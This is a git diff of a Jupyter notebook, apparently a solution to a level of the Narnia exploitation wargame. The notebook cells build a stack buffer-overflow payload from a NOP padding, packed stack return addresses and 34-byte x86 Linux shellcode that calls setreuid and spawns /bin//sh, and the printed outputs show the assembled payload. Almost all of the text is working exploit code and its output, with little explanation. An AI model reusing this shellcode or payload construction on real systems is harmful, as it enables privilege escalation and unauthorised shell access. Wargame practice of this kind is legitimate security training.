--- a/Narnia/narnia.ipynb
+++ b/Narnia/narnia.ipynb
@@ -9,7 +9,7 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 9,
+   "execution_count": 2,
    "metadata": {},
    "outputs": [],
    "source": [
@@ -78,32 +78,68 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 15,
+   "execution_count": 8,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "b'\\xa6\\xd5\\xff\\xff'\n",
-      "b'\\x8a\\xd5\\xff\\xff'\n",
-      "b'\\x97O\\xfc\\xf7'\n",
-      "b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x8a\\xd5\\xff\\xff\\x97O\\xfc\\xf7\\x97O\\xfc\\xf7j1X\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1jFX\\xcd\\x80\\xb0\\x0bRhn/shh//bi\\x89\\xe3\\x89\\xd1\\xcd\\x80'\n"
+      "b'\\xd6\\xd5\\xff\\xff'\n",
+      "b'\\xa0\\xd5\\xff\\xff'\n",
+      "b'\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xd6\\xd5\\xff\\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xa0\\xd5\\xff\\xffj1X\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1jFX\\xcd\\x80\\xb0\\x0bRhn/shh//bi\\x89\\xe3\\x89\\xd1\\xcd\\x80' 74\n"
      ]
     }
    ],
    "source": [
     "padding = b\"\\x90\" * 20\n",
-    "blah = struct.pack(\"<I\", 0xFFFFD58A)\n",
-    "target = struct.pack(\"<I\", 0xFFFFD58A + len(padding) + len(blah) * 2)\n",
-    "print(target)\n",
-    "target = struct.pack(\"<I\", 0xF7FC4F97)\n",
     "shellcode = b\"\\x6a\\x31\\x58\\x99\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x6a\\x46\\x58\\xcd\\x80\\xb0\\x0b\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x89\\xd1\\xcd\\x80\"\n",
     "\n",
-    "payload = padding + blah + target * 2 + shellcode\n",
+    "blah_addr = 0xFFFFD5D6\n",
+    "blah = struct.pack(\"<I\", blah_addr)\n",
+    "target = struct.pack(\"<I\", blah_addr - 4 - 12 - 4 - len(shellcode))\n",
+    "\n",
+    "payload = padding + blah + b\"\\x90\" * 12 + target + shellcode\n",
+    "\n",
     "print(blah)\n",
     "print(target)\n",
-    "print(payload)"
+    "print(payload, len(payload))"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 11,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'\\xb8\\xd5\\xff\\xff'\n",
+      "b'\\xb4\\xd5\\xff\\xff'\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(struct.pack(\"<I\", 0xFFFFD5B8))\n",
+    "print(struct.pack(\"<I\", 0xFFFFD5B8 - 4))"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "34\n"
+     ]
+    }
+   ],
+   "source": [
+    "print(len(shellcode))"
    ]
   },
   {
@@ -114,7 +150,7 @@
     {
      "data": {
       "text/plain": [
-       "594"
+       "b'\\x86\\xd5\\xff\\xff'"
       ]
      },
      "execution_count": 14,
@@ -123,7 +159,7 @@
     }
    ],
    "source": [
-    "0xFFFFD5A6 - 0xFFFFD354"
+    "struct.pack(\"<I\", 0xFFFFD5B4 - 4 - 8 - 34)"
    ]
   }
  ],
